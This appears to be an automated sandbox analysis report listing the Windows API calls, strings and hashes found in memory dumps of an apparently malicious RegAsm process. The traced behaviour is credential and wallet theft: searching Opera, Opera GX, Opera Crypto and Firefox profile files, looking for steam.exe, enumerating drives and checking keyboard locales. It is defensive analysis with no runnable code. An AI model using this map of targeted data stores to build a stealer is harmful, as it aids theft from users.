                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                      • String ID: %s\%s
                                                                                      • API String ID: 1150833511-4073750446
                                                                                      • Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                      • Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
                                                                                      • Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                      • Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                      • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                      • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                      • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                      • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                      • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                      • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                      • API String ID: 2567437900-1710495004
                                                                                      • Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                      • Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
                                                                                      • Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                      • Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88
                                                                                      APIs
                                                                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                      • _memset.LIBCMT ref: 004151E5
                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                        • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                        • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                        • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                        • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                        • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                        • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                        • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                        • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                        • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                        • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                        • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                      • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                      • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                      • API String ID: 441469471-147700698
                                                                                      • Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                      • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                                      • Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                      • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                      • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                      • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                      • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                      • FindClose.KERNEL32(?), ref: 004023B6
                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                      • FindClose.KERNEL32(?), ref: 004026DA
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                        • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 1116797323-1173974218
                                                                                      • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                      • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                      • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                      • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                      • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                      • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                      • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                      • CopyFileA.KERNEL32(?,?,00000001,0043758C,004368AF), ref: 0040D7E8
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 0040D956
                                                                                      • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                      • String ID: prefs.js
                                                                                      • API String ID: 893096357-3783873740
                                                                                      • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                      • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                      • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                      • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
                                                                                      • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                      • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                      • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
                                                                                      • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3801961486-0
                                                                                      • Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                      • Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
                                                                                      • Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                      • Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9
                                                                                      APIs
                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                      • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                      • String ID: steam.exe
                                                                                      • API String ID: 1799959500-2826358650
                                                                                      • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                      • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
                                                                                      • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                      • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                      • String ID: /
                                                                                      • API String ID: 507856799-4001269591
                                                                                      • Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                      • Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
                                                                                      • Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                      • Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54
                                                                                      APIs
                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
